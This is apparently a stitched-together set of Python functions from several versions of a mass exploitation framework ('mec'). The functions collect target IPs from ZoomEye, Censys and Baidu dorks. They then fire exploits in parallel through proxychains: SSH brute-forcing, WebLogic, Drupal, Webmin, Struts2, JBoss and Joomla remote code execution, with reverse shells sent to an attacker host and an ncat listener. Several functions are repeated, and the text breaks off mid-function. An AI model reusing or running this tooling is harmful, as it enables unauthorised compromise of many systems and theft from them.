def ssh_bruteforcer(session): ''' bruteforce one target using a password list ''' colors.colored_print('\n[*] Welcome to SSH bruteforcer', colors.BLUE) password_list = console.input_check( "[*] Password list file to use (put them under ./data): ", allow_blank=False, choices=glob.glob(core.MECROOT+"/data/*.txt")) if not os.path.isfile(password_list): console.print_error("[-] Password list not found") return None # command to exec command = console.input_check("[*] Command to exec: ", allow_blank=False) # args list exploit = 'ssh_bruteforce.py' work_path = '/ssh-bruteforce/' exec_path = exploit custom_args = ["-p", password_list, "-c", command] jobs = 100 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def ssh_bruteforcer(): ''' call single thread ssh_bruteforcer ''' password_list = console.input_check( "[*] Password list file to use: ", allow_blank=False) if not os.path.isfile(password_list): console.print_error("[-] Password list not found") return [] # command to exec command = console.input_check("[*] Command to exec: ", allow_blank=False) # args list exploit = 'ssh_bruteforce.py' work_path = '/ssh-bruteforce/' exec_path = exploit custom_args = str(password_list + ' ' + command).split() jobs = 100 print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path, ' '.join(custom_args))) # start scanner scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs) return scanner_args
def jboss(): ''' jboss rce ''' print(colors.BLUE + '\n[*] Welcome to JBoss RCE' + colors.END) # port = console.input_check("[?] Port of the target server: ", # check_type=int) ostype = console.input_check("[?] Windows or Linux? [w/l]", choices=['w', 'l']) cmd = console.input_check("[?] Command to execute on the target: ", allow_blank=False) java_payload(ostype, cmd)
def main(): ''' manage procedure ''' answ = str( input(colors.CYAN + '[?] Use ip_list.txt as target list? [y/n] ' + colors.END)).strip() if answ.lower() == 'n': os.system("ls data") SessionParameters.IP_LIST = SessionParameters.INIT_DIR + '/data/' + \ input_check( '[=] Choose your target IP list, eg. ip_list.txt ', allow_blank=False) while True: try: cmd = input(colors.CYAN + colors.BOLD + colors.UNDERLINE + "\nmec" + colors.END + colors.CYAN + colors.BOLD + " > " + colors.END) try: execute(cmd) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0) except KeyboardInterrupt: try: answ = input("\n[?] Are you sure to exit? [y/n] ") except KeyboardInterrupt: print("\n[-] Okay okay, exiting immediately...") check_kill_process('ss-proxy') sys.exit(0) if answ.lower() == 'y': check_kill_process('ss-proxy') sys.exit(0) else: continue
def login_and_crawl(): ''' get verified with zoomeye, and start thread pool for crawling ''' amnt = int( console.input_check( "[*] How many pages to crawl? (10 IPs on each page) ", check_type=int).strip()) threads = [] api = ZoomEyeAPI('conf/zoomeye.conf') try: print(colors.BLUE + '[*] Crawling fetched pages from ZoomEye...' + colors.END) access_token = api.login() headers = { 'Authorization': 'JWT ' + access_token, } except TypeError: console.print_error('[-] Invalid access token') return # test if we have permission to zoomeye api test_crawl = crawler(ZoomEyeAPI.QRY, 1, headers) if test_crawl is not None and test_crawl != '': console.print_error(test_crawl) return from multiprocessing import Process status = Process(target=progress, args=(ZoomEyeAPI.OUTFILE, )) status.start() limit = 0 for page in range(1, int(amnt)): thd = threading.Thread(target=crawler, args=( ZoomEyeAPI.QRY, page, headers, )) threads.append(thd) try: for job in threads: job.setDaemon(True) job.start() if limit in (0, 10): limit = 0 job.join() limit += 1 except (EOFError, KeyboardInterrupt, SystemExit): status.terminate() return else: pass # stop progress monitoring when we are done status.terminate()
def witbe(session): ''' witbe rce ''' colors.colored_print('\n[*] Welcome to Witbe RCE', colors.BLUE) # shell server config rhost = console.input_check('[?] IP of your shell server: ', ip_check=True) rport = console.input_check('[?] and Port? ', check_type=int) # exploit config exploit = 'witbe.py' work_path = '/witbe/' exec_path = exploit custom_args = ["-l", rhost, "-p", rport] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def run(): ''' run this script ''' try: ZoomEyeAPI.QRY = console.input_check("[*] Your query is: ", allow_blank=False) ZoomEyeAPI.SEARCH_TYPE = console.input_check( "[?] Search for public devices (h) or web services (w)? [h/w] ", choices=['h', 'w']) # remove special characters that may cause naming problem outfile_name = ZoomEyeAPI.QRY for special_ch in ['"', "'", ':', '!', '\\', '/']: if special_ch in outfile_name: outfile_name = outfile_name.replace(special_ch, ' ') ZoomEyeAPI.OUTFILE = './data/zoomeye-{}.txt'.format('-'.join( outfile_name.split())) main() except (EOFError, KeyboardInterrupt, SystemExit): print('\n[*] Exiting...') else: console.debug_except()
def witbe(session): ''' witbe rce ''' print(colors.BLUE + '\n[*] Welcome to Witbe RCE' + colors.END) # shell server config rhost = console.input_check('[?] IP of your shell server: ') rport = console.input_check('[?] and Port? ', check_type=int) # exploit config exploit = 'witbe.py' work_path = '/witbe/' exec_path = exploit custom_args = str('-l ' + rhost + ' -p ' + rport).split() jobs = 50 print(colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(exec_path), ' '.join(custom_args)) # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def main(): ''' handles user interface ''' answ = str( input( colors.CYAN + '[?] Use ip_list.txt as target list? [y/n] ' + colors.END)).strip() if answ.lower() == 'n': os.system("ls data") SESSION.ip_list = SESSION.init_dir + '/data/' + \ input_check( '[=] Choose your target IP list, eg. ip_list.txt ', choices=os.listdir('data')) while True: try: cmd = input( colors.CYAN + colors.BOLD + colors.UNDERLINE + "\nmec" + colors.END + colors.CYAN + colors.BOLD + " > " + colors.END) try: execute(cmd) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0) except KeyboardInterrupt: try: answ = input("\n[?] Are you sure to exit? [y/n] ") except KeyboardInterrupt: print("\n[-] Okay okay, exiting immediately...") check_kill_process('ss-proxy') sys.exit(0) if answ.lower() == 'y': check_kill_process('ss-proxy') sys.exit(0) else: continue
def weblogic_cve201710271(session): ''' CVE-2017-10271 ''' colors.colored_print('\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE) # shell server config command = console.input_check('[?] Command to execute on the target: ', allow_blank=False) target_os = console.input_check( "[?] Target OS, default to linux [linux/win]: ", choices=["linux", "win"]) # exploit config exploit = 'weblogic_cve-2017-10271.py' work_path = '/weblogic/' exec_path = exploit custom_args = ["-c", command, "-os", target_os] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def weblogic(): ''' with reverse shell ''' print(colors.BLUE + '\n[*] Welcome to Weblogic getshell exploit' + colors.END) server_port = console.input_check( "[?] What's the port of Welogic server? ", check_type=int) os_type = console.input_check( '[?] Windows or Linux? [w/l] ', choices=['w', 'l']) if console.input_check('[?] Do you need a reverse shell? [y/n] ', choices=['y', 'n']) == 'y': shell_server = console.input_check( '[?] What\'s the IP of shell receiver? ', allow_blank=False, ip_check=True) port = console.input_check( '[?] What\'s the port of shell receiver? ', check_type=int) if os_type.lower() == 'w': custom_args = '-l {} -p {} -P {} --silent -T '.format( shell_server, port, server_port) +\ 'reverse_shell -os win' custom_args = custom_args.split() elif os_type.lower() == 'l': custom_args = '-l {} -p {} -P {} --silent -T '.format( shell_server, port, server_port) +\ 'reverse_shell -os linux' custom_args = custom_args.split() else: console.print_error('[-] Invalid input') return [] else: cmd = console.input_check( '[?] What command do you want to execute on the target? ', allow_blank=False).strip() if os_type.lower() == 'w': custom_args = '-P {} --silent -T exploit -c {} -os win'.format( server_port, cmd).split() elif os_type.lower() == 'l': custom_args = '-P {} --silent -T exploit -c {} -os linux'.format( server_port, cmd).split() else: return [] # start scanner exploit = 'weblogic.py' work_path = '/weblogic/' exec_path = exploit jobs = 100 # waitTime = 25 # deprecated scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs) return scanner_args
def run_masscan(**kwargs): """ run masscan external tool, mass scale internet scanner """ session = kwargs.get("session", None) # check root, as masscan requires root privilege if not session.is_root: console.print_error( "[-] Please run mec as root in order to run masscan") return ports = console.input_check( "[?] What ports do you want to scan (eg. 80 443)? ").split() try: scan.masscan(ports) except KeyboardInterrupt: console.print_warning("[-] masscan exited")
def webmin_cve_2019_15107(session): ''' CVE_2019_15107 RCE ''' colors.colored_print('\n[*] Welcome to Webmin CVE-2019-15107', colors.BLUE) # shell server config command = console.input_check( '[?] Command to execute on the target: ', allow_blank=False) # exploit config exploit = 'webmin.py' work_path = '/webmin/' exec_path = exploit custom_args = ["-c", command] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def drupal_cve20196340(session): ''' drupal RCE ''' colors.colored_print('\n[*] Welcome to Drupal CVE-2019-6340', colors.BLUE) # shell server config command = console.input_check('[?] Command to execute on the target: ', allow_blank=False) # exploit config exploit = 'cve-2019-6340_cmd.py' work_path = '/drupal/' exec_path = exploit custom_args = ["-c", command] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)
def main(): ''' handles user interface ''' rlinit.CMD_LIST = rlinit.readline_init(SESSION) answ = str( input(colors.CYAN + '[?] Use ip_list.txt as target list? [y/n] ' + colors.END)).strip() if answ.lower() == 'n': os.system("ls ~/.mec/data") SESSION.ip_list = SESSION.init_dir + '/data/' + \ console.input_check( '[=] Choose your target IP list, eg. ip_list.txt ', choices=os.listdir(core.MECROOT + '/data')) while True: try: input_cmd = input(colors.CYAN + colors.BOLD + "\nmec > " + colors.END) try: cmd.cmd_handler(SESSION, input_cmd) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0) except KeyboardInterrupt: try: answ = input("\n[?] Are you sure to exit? [y/n] ") except KeyboardInterrupt: print("\n[-] Okay okay, exiting immediately...") futil.check_kill_process('ss-proxy') sys.exit(0) if answ.lower() == 'y': futil.check_kill_process('ss-proxy') sys.exit(0) else: continue
def s2_045(): ''' struts2 045 rce ''' print(colors.BLUE + '\n[*] Welcome to S2-045' + colors.END) port = console.input_check('[?] What\'s the port of your target server? ', check_type=int) # args list exploit = 's2_045_cmd.py' work_path = '/structs2/' exec_path = exploit custom_args = str('-p ' + port).split() jobs = 100 print( colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(exec_path), ' '.join(custom_args)) # start scanner scanner_args = (exploit, work_path, exec_path, custom_args, jobs) return scanner_args
def scan(self): ''' Execute exploit against given ip list ''' try: work_path, exec_path = self.work_path, self.exec_path custom_args, jobs = self.custom_args, self.jobs except BaseException: console.print_error("[-] Invalid config") return if self.session.use_proxy: e_args = [ 'proxychains4', '-f', self.session.proxy_conf, './' + exec_path] else: e_args = ['./' + exec_path] # add custom arguments for different exploits e_args += custom_args # the last argument is target host e_args += ['-t'] try: target_list = open(self.session.ip_list) except BaseException as exc: console.print_error('[-] Error occured: {}\n'.format(exc)) console.debug_except() return try: os.chdir('./exploits/' + work_path) except FileNotFoundError: console.print_error("[-] Can't chdir to " + work_path) console.debug_except() console.print_warning( '\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd()) # you might want to cancel the scan to correct some errors if console.input_check('[?] Proceed? [y/n] ', choices=['y', 'n']) == 'n': return # save stdout to logfile try: logfile = open(self.session.logfile, "a+") except FileNotFoundError: console.print_error("[-] Log file not found") # needed for the loop procs = [] pool = [] # holds all processes, check if empty when finishing count = len(procs) # display help for viewing logs print(colors.CYAN + "[*] Use `tail -f {}` to view logs\n\n".format(self.session.logfile)) # use progress bar with open(self.session.ip_list) as iplistf: total = len([0 for _ in iplistf]) iplistf.close() pbar = tqdm.tqdm(total=total, ncols=80, desc="[*] Processing targets") for line in target_list: target_ip = line.strip() # mark this loop as done count = len(procs) try: # start and display current process e_args += [target_ip] proc = subprocess.Popen(e_args, stdout=logfile, stderr=logfile) procs.append(proc) pool.append(proc) pbar.set_description( desc="[*] Processing {}".format(target_ip)) # continue to next target e_args.remove(target_ip) # process pool if count == jobs: for item in procs: if psutil.pid_exists(item.pid): timer_proc = Process( target=futil.proc_timer, args=(item, )) timer_proc.start() else: pool.remove(item) procs = [] except (EOFError, KeyboardInterrupt, SystemExit): console.print_error("[-] Task aborted") break except BaseException as exc: logfile.write("[-] Exception: " + str(exc) + "\n") finally: # check if any procs are done, remove them from pool, update progress bar try: for proc in pool: if proc.poll() is not None: pool.remove(proc) pbar.update(1) except BaseException: logfile.write("[-] Exception: " + traceback.format_exc() + "\n") # make sure all processes are done if pool: for proc in pool: try: proc.terminate() proc.wait() except (EOFError, KeyboardInterrupt, SystemExit): pass # close logfile, exit progress bar, and print done flag logfile.close() pbar.close() os.chdir(self.session.init_dir) console.print_success('\n[+] All done!\n') # this fixes #37, because when parent gets killed, all zombie children die sys.exit()
def start(): query = input_check("[?] Search query: ", allow_blank=False) pages = input_check("[?] Pages to crawl: ", check_type=int) return run_search(query, pages)
def scanner(scanner_args): ''' Execute exploit against given ip list ''' # looks ugly, but since it works well, im not planning a rewrite _, work_path, exec_path, custom_args, jobs = scanner_args[0], \ scanner_args[1], scanner_args[2], scanner_args[3], scanner_args[4] if SessionParameters.USE_PROXY: e_args = [ 'proxychains4', '-q', '-f', SessionParameters.PROXY_CONF, './' + exec_path ] else: e_args = ['./' + exec_path] e_args += custom_args e_args += ['-t'] try: target_list = open(SessionParameters.IP_LIST) except BaseException as exc: console.print_error('[-] Error occured: {}\n'.format(exc)) debug_except() return os.chdir('./exploits/' + work_path) console.print_warning('\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd()) if input_check('[?] Proceed? [y/n] ', choices=['y', 'n']) == 'n': return console.print_warning('\n[!] It might be messy, get ready!' + '\n') time.sleep(2) count = 0 tested = count rnd = 1 for line in target_list: target_ip = line.strip() progress = colors.BLUE + colors.BOLD + 'ROUND.' + \ str(rnd) + colors.END + ' ' + colors.CYAN + colors.BOLD + \ str(tested + 1) + colors.END + ' targets found\n' try: sys.stdout.write('\r' + progress) sys.stdout.flush() except KeyboardInterrupt: exit() count += 1 tested += 1 try: e_args += [target_ip] print(colors.CYAN + ' '.join(e_args) + colors.END + '\n') proc = subprocess.Popen(e_args) # continue to next target e_args.remove(target_ip) time.sleep(.1) if count == jobs or count == 0: count = 0 rnd += 1 _, _ = proc.communicate() if proc.returncode is not None: proc.kill() continue sys.stdout.flush() os.system('clear') except (EOFError, KeyboardInterrupt, SystemExit): sys.exit(1) else: console.print_error('[-] Error when running scanner') debug_except() os.system('clear') os.chdir(SessionParameters.INIT_DIR) console.print_success('\n[+] All done!\n') print(console.INTRO)
def attack(): ''' handles attack command ''' if input_check('[?] Do you wish to use proxychains? [y/n] ', choices=['y', 'n']) == 'y': SessionParameters.USE_PROXY = True else: SessionParameters.USE_PROXY = False answ = input_check('\n[?] Do you wish to use\ \n\n [a] built-in exploits\ \n [m] or launch your own manually?\ \n\n[=] Your choice: ', choices=['a', 'm']) if answ == 'a': print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n') print(console.BUILT_IN) answ = input_check('[=] Your choice: ', check_type=int, choices=['0', '1', '2', '3', '4']) try: if answ == '2': console.print_error("\n[-] Under development") elif answ == '1': console.print_error('\n[-] Under development') elif answ == '0': scanner(ExecExp.weblogic()) elif answ == '3': scanner(ExecExp.s2_045()) elif answ == '4': scanner(ExecExp.witbe()) except BaseException: console.print_error("[-] We have an error executing exploit") debug_except() elif answ == 'm': print(colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can choose your own exploit\n" + colors.END) print(colors.CYAN + '[*] Here are available exploits:\n' + colors.END) for poc in list_exp(): print(colors.BLUE + poc + colors.END) exploit = input_check( "\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ", choices=list_exp()) jobs = int( input_check("[?] How many processes each time? ", check_type=int)) custom_args = [] answ = input_check("[?] Do you need a reverse shell [y/n]? ", choices=['y', 'n']) if answ == 'y': lhost = input("[*] Where do you want me to send shells? ").strip() lport = input_check( "[*] and at what port? (make sure you have access to that port) ", check_type=int) custom_args = ['-l', lhost, '-p', lport] answ = input_check( '[*] Do you need me to start a listener? [y/n] ', choices=['y', 'n']) if answ == 'y': print("\n[*] Spawning ncat listener in new window...\n") try: subprocess.Popen(args=[ "gnome-terminal", "--command=ncat -nklvp " + lport + " -m 1000" ], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except BaseException: print( colors.YELLOW + "[-] Could not launch our listener, do you have GNOME-Terminal installed?" + colors.END + '\n') else: print( "[*] Okay, just make sure you receive the reverse shells\n" ) else: pass custom_args += input( "[*] args for this exploit (target IP is handled already) ").strip( ).split() exec_path = exploit.split('/')[1:] work_path = exploit.split('/')[:-1] delimtr = '/' exec_path = delimtr.join(exec_path) work_path = delimtr.join(work_path) delimtr = ' ' print( colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format( exec_path), delimtr.join(custom_args)) scanner_args = (exploit, work_path, exec_path, custom_args, jobs) scanner(scanner_args) else: console.print_error('[-] Invalid input')
def scanner(scanner_args): ''' Execute exploit against given ip list ''' # looks ugly, but since it works well, im not planning a rewrite try: work_path, exec_path = scanner_args.work_path, scanner_args.exec_path custom_args, jobs = scanner_args.custom_args, scanner_args.jobs except BaseException: return if SESSION.use_proxy: e_args = [ 'proxychains4', '-q', '-f', SESSION.proxy_conf, './' + exec_path ] else: e_args = ['./' + exec_path] # add custom arguments for different exploits e_args += custom_args # the last argument is target host e_args += ['-t'] try: target_list = open(SESSION.ip_list) except BaseException as exc: console.print_error('[-] Error occured: {}\n'.format(exc)) debug_except() return try: os.chdir('./exploits/' + work_path) except FileNotFoundError: console.print_error("[-] Can't chdir to " + work_path) debug_except() console.print_warning('\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd()) # you might want to cancel the scan to correct some errors if input_check('[?] Proceed? [y/n] ', choices=['y', 'n']) == 'n': return # save stdout to logfile try: logfile = open(SESSION.logfile, "a+") except FileNotFoundError: console.print_error("[-] Log file not found") # needed for the loop procs = [] pids = [] # collects all pids, check if empty when finishing count = len(procs) # display help for viewing logs print(colors.CYAN + "[*] Use `tail -f {}` to view logs\n\n".format(SESSION.logfile)) # use progress bar with open(SESSION.ip_list) as iplistf: total = len([0 for _ in iplistf]) iplistf.close() pbar = tqdm.tqdm(total=total, ncols=80, desc="[*] Processing targets") for line in target_list: target_ip = line.strip() # mark this loop as done count = len(procs) try: # start and display current process e_args += [target_ip] proc = subprocess.Popen(e_args, stdout=logfile, stderr=logfile) procs.append(proc) pids.append(proc.pid) pbar.set_description(desc="[*] Processing {}".format(target_ip)) # continue to next target e_args.remove(target_ip) # process pool if count == jobs: for item in procs: if psutil.pid_exists(item.pid): timer_proc = Process(target=proc_timer, args=(item, )) timer_proc.start() else: pids.remove(item.pid) procs = [] except (EOFError, KeyboardInterrupt, SystemExit): # killall running processes check_kill_process(exec_path) logfile.close() pbar.close() console.print_error("[-] Task aborted") os.chdir(SESSION.init_dir) return except BaseException as exc: console.print_error("[-] Exception: {}\n".format(str(exc))) logfile.write("[-] Exception: " + str(exc) + "\n") finally: # check if any pids are done try: for pid in pids: if not psutil.pid_exists(pid): pids.remove(pid) pbar.update(1) except BaseException: pass # make sure all processes are done if pids: time.sleep(10) # kill everything thats going to be a zombie, close logfile, exit progress bar, and print done flag check_kill_process(exec_path) logfile.close() pbar.close() os.chdir(SESSION.init_dir) console.print_success('\n[+] All done!\n')
def attack(): ''' handles attack command ''' SESSION.use_proxy = input_check( '[?] Do you wish to use proxychains? [y/n] ', choices=['y', 'n']) == 'y' if SESSION.use_proxy: if shutil.which("proxychains4") is None: console.print_error("proxychains4 not found") return execute("proxy") answ = input_check('\n[?] Do you wish to use\ \n\n [a] built-in exploits\ \n [m] or launch your own manually?\ \n\n[=] Your choice: ', choices=['a', 'm']) if answ == 'a': print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n') print(console.BUILT_IN) answ = input_check('[=] Your choice: ', check_type=int, choices=['0', '1', '2', '3', '4']) try: if answ == '0': scanner(exploit_exec.ssh_bruteforcer()) elif answ == '1': scanner(exploit_exec.weblogic()) elif answ == '2': console.print_error("[-] Not available") elif answ == '3': console.print_error("[-] Not available") elif answ == '4': scanner(exploit_exec.s2_045()) except (EOFError, KeyboardInterrupt, SystemExit): return elif answ == 'm': print(colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can choose your own exploit\n" + colors.END) colored_print('[*] Here are available exploits:\n', colors.CYAN) for poc in list_exp(): colored_print(poc + colors.END, colors.BLUE) exploit = input_check( "\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ", choices=list_exp()) jobs = int( input_check("[?] How many processes each time? ", check_type=int)) custom_args = [] answ = input_check("[?] Do you need a reverse shell [y/n]? ", choices=['y', 'n']) if answ == 'y': lhost = input_check("[*] Where do you want me to send shells? ", allow_blank=False, ip_check=True) lport = input_check("[*] and at what port?", check_type=int) custom_args = ['-l', lhost, '-p', lport] else: pass custom_args += input_check( "[*] args for this exploit: ").strip().split() # parse user's exploit name exec_path = exploit.split('/')[1:] work_path = exploit.split('/')[:-1] exec_path = '/'.join(exec_path) work_path = '/'.join(work_path) # let user check if there's anything wrong print( colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format( exec_path), ' '.join(custom_args)) # args as parameter for scanner scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs) # start scanner scanner(scanner_args) else: console.print_error('[-] Invalid input')
def execute(cmd): ''' handles user input in console ''' # lol i don't want any errors here cmd = str(cmd).lower().strip() if cmd == '': return if cmd == "masscan": # check root, as masscan requires root privilege if os.geteuid() != 0: console.print_error( "[-] Please run mec as root in order to run masscan") return ports = console.input_check( "[?] What ports do you want to scan (eg. 80 443)? ").split() try: scan.masscan(ports) except KeyboardInterrupt: console.print_warning("[-] masscan exited") elif cmd == 'info': colored_print( '[*] Current directory: {}\ \n[*] Init directory: {}\ \n[*] Log file: {}\ \n[*] Target: {}\ \n[*] Proxy config: {}'.format(os.getcwd(), SESSION.init_dir, SESSION.logfile, SESSION.ip_list, SESSION.proxy_conf), colors.CYAN) elif cmd.startswith('target'): target = ''.join(cmd.split()[1:]) if target not in os.listdir(SESSION.init_dir + '/data'): console.print_error("[-] Target file not found") return colored_print('[i] Target changed to {}'.format(target), colors.BLUE) SESSION.ip_list = SESSION.init_dir + \ '/data/' + target elif cmd in ('init', 'i'): colored_print('[*] Going back to init_dir...', colors.BLUE) os.chdir(SESSION.init_dir) elif cmd.startswith('baidu'): try: command = cmd.strip().split() dork = command[1] count = int(command[2]) os.chdir(SESSION.out_dir) colored_print('[*] Searching on Baidu...', colors.PURPLE) baidu.spider(dork, count) if yes_no("Use collected URL's as target?"): SESSION.ip_list = SESSION.init_dir + "result.txt" except (IndexError, EOFError, KeyboardInterrupt, SystemExit): return elif cmd == 'proxy': if not os.path.exists(SESSION.ss_config): console.print_error('[-] Please make sure {} exists'.format( SESSION.ss_config)) try: subprocess.Popen([SESSION.proxy_bin, '-c', SESSION.ss_config], stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False) except BaseException as err: console.print_error('[-] Error starting Shadowsocks proxy: ' + str(err)) debug_except() elif cmd == 'redis': console.print_error('[-] Under development') elif cmd.startswith('google'): try: cmd = cmd.strip().split() dork = cmd[1] # well yes im a lazy guy subprocess.call([ './exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork, '--revshell=\'127.0.0.1\'', '--port=4444' ]) except BaseException as err: console.print_error(str(err)) debug_except() elif cmd in ('q', 'quit'): check_kill_process('ss-proxy') sys.exit(0) elif cmd in ('h', 'help', '?'): print(console.HELP_INFO) elif cmd == 'exploits': colored_print('[+] Available exploits: ', colors.CYAN) for poc in list_exp(): colored_print(poc, colors.BLUE) elif cmd in ('z', "zoomeye"): try: console.print_warning( "[*] ZoomEye now asks for phone verification (+86 only)") zoomeye.run() except (EOFError, KeyboardInterrupt, SystemExit): pass else: debug_except() elif cmd == "censys": try: output = censys.start() if yes_no("Use collected URL's as target?"): SESSION.ip_list = SESSION.init_dir + "/" + output colored_print( '[i] Target changed to {}'.format(SESSION.ip_list), colors.BLUE) except BaseException: return elif cmd in ('x', 'reset'): os.system("reset") elif cmd in ('c', 'clear'): os.system("clear") elif cmd in ("attack", "e"): attack() else: try: print(colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END, colors.GREEN + cmd, colors.END) os.system(cmd) except (EOFError, KeyboardInterrupt, SystemExit): return
def scanner(scanner_args): ''' Execute exploit against given ip list ''' # looks ugly, but since it works well, im not planning a rewrite work_path, exec_path, custom_args, jobs = scanner_args[ 0], scanner_args[1], scanner_args[2], scanner_args[3] if SESSION.use_proxy: e_args = [ 'proxychains4', '-q', '-f', SESSION.proxy_conf, './' + exec_path] else: e_args = ['./' + exec_path] # add custom arguments for different exploits e_args += custom_args # the last argument is target host e_args += ['-t'] try: target_list = open(SESSION.ip_list) except BaseException as exc: console.print_error('[-] Error occured: {}\n'.format(exc)) debug_except() return try: os.chdir('./exploits/' + work_path) except FileNotFoundError: console.print_error("[-] Can't chdir to " + work_path) debug_except() console.print_warning( '\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd()) # you might want to cancel the scan to correct some errors if input_check('[?] Proceed? [y/n] ', choices=['y', 'n']) == 'n': return console.print_warning('\n[!] It might be messy, get ready!' + '\n') time.sleep(2) # needed for the loop count = 0 tested = count rnd = 1 # save stdout to logfile logfile = open(SESSION.logfile, "a+") # start a thread in backgroud to display tailf info log = SESSION.logfile status = Process(target=tailf, args=(log,)) try: status.start() except (SystemExit, KeyboardInterrupt, EOFError): status.terminate() for line in target_list: target_ip = line.strip() # display progress info on top progress = colors.CYAN + colors.BOLD + \ str(tested + 1) + colors.END + ' targets found\n' try: os.system('clear') sys.stdout.write('\r' + progress) sys.stdout.flush() except KeyboardInterrupt: exit() # mark this loop as done count += 1 tested += 1 try: # start and display current process e_args += [target_ip] sys.stdout.write( '\r' + colors.CYAN + ' '.join(e_args) + colors.END + '\n') sys.stdout.flush() try: proc = subprocess.Popen(e_args, stdout=logfile, stderr=logfile) except (KeyboardInterrupt, EOFError, SystemExit): proc.kill() # continue to next target e_args.remove(target_ip) time.sleep(.13) # process pool if count == jobs or count == 0: count = 0 rnd += 1 _, _ = proc.communicate() # if returned any exit code, consider the process as done if proc.returncode is not None: proc.kill() continue except (EOFError, KeyboardInterrupt, SystemExit): sys.exit(1) # close logfile logfile.close() os.system('clear') os.chdir(SESSION.init_dir) console.print_success('\n[+] All done!\n') print(console.INTRO)
def attack(self): ''' handles attack command ''' self.use_proxy = console.yes_no( '[?] Do you wish to use proxy_pool/proxychains?') if self.use_proxy: if shutil.which("proxychains4") is None: console.print_error("proxychains4 not found") return # sleep between two subprocess open sleep_seconds = console.input_check("\n[?] Wait how many seconds" + " before each process launch?\n" + " (Set it to 0 when you want to use 100% CPU" + " / bandwidth\n Recommened value: 0.1)\n" + "\n[=] Your input: ", check_type=float) answ = console.input_check( '\n[?] Do you wish to use\ \n\n [1] built-in exploits\ \n [2] or launch your own manually?\ \n\n[=] Your choice: ', choices=['1', '2', 'built-in', 'manually']) if answ in ['1', 'built-in']: print( colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n') colors.colored_print(futil.BUILT_IN, colors.GREEN) module = console.input_check( "[?] Choose your exploit module: ", choices=futil.BUILT_IN.split('\n'), allow_blank=False) try: scanner_instance = exploit_exec.EXPLOIT_DICT.get(module)(self) if scanner_instance is None: return scanner_instance.sleep_seconds = sleep_seconds scanner_instance.scan() return except (EOFError, KeyboardInterrupt, SystemExit): return # run custom exploits print( colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can invoke your own exploit\n" + colors.END) cmd.run_exploits() exploit = console.input_check( "\n[*] Enter the path (eg. test/test) to your exploit: ", choices=futil.list_exp()) jobs = int( console.input_check("[?] How many processes each time? ", check_type=int)) custom_args = console.input_check( "[*] Addtional args for this exploit (other than `-t <target>`): ").strip().split() # parse user's exploit name exec_path = exploit.split('/')[1:] work_path = exploit.split('/')[:-1] exec_path = '/'.join(exec_path) work_path = '/'.join(work_path) # args as parameter for scanner scanner_instance = Scanner(work_path, exec_path, custom_args, jobs, sleep_seconds, self) # start scanner scanner_instance.scan()
def scanner(scanner_args): ''' Execute exploit against given ip list ''' # looks ugly, but since it works well, im not planning a rewrite work_path, exec_path = scanner_args.work_path, scanner_args.exec_path custom_args, jobs = scanner_args.custom_args, scanner_args.jobs if SESSION.use_proxy: e_args = [ 'proxychains4', '-q', '-f', SESSION.proxy_conf, './' + exec_path ] else: e_args = ['./' + exec_path] # add custom arguments for different exploits e_args += custom_args # the last argument is target host e_args += ['-t'] try: target_list = open(SESSION.ip_list) except BaseException as exc: console.print_error('[-] Error occured: {}\n'.format(exc)) debug_except() return try: os.chdir('./exploits/' + work_path) except FileNotFoundError: console.print_error("[-] Can't chdir to " + work_path) debug_except() console.print_warning('\n[!] DEBUG: ' + str(e_args) + '\nWorking in ' + os.getcwd()) # you might want to cancel the scan to correct some errors if input_check('[?] Proceed? [y/n] ', choices=['y', 'n']) == 'n': return console.print_warning('\n[!] It might be messy, get ready!' + '\n') time.sleep(2) # save stdout to logfile try: logfile = open(SESSION.logfile, "a+") except FileNotFoundError: console.print_error("[-] Log file not found") # needed for the loop procs = [] count = len(procs) tested = count # use curses to display output import curses stdscr = curses.initscr() curses.start_color() curses.use_default_colors() curses.init_pair(1, curses.COLOR_CYAN, -1) curses.init_pair(2, curses.COLOR_WHITE, -1) curses.init_pair(3, curses.COLOR_GREEN, -1) for line in target_list: target_ip = line.strip() # clear screen for each output stdscr.refresh() # display progress info on top progress = str(tested) + ' targets found' # tail to get the last line of log file status = tail(SESSION.logfile) # mark 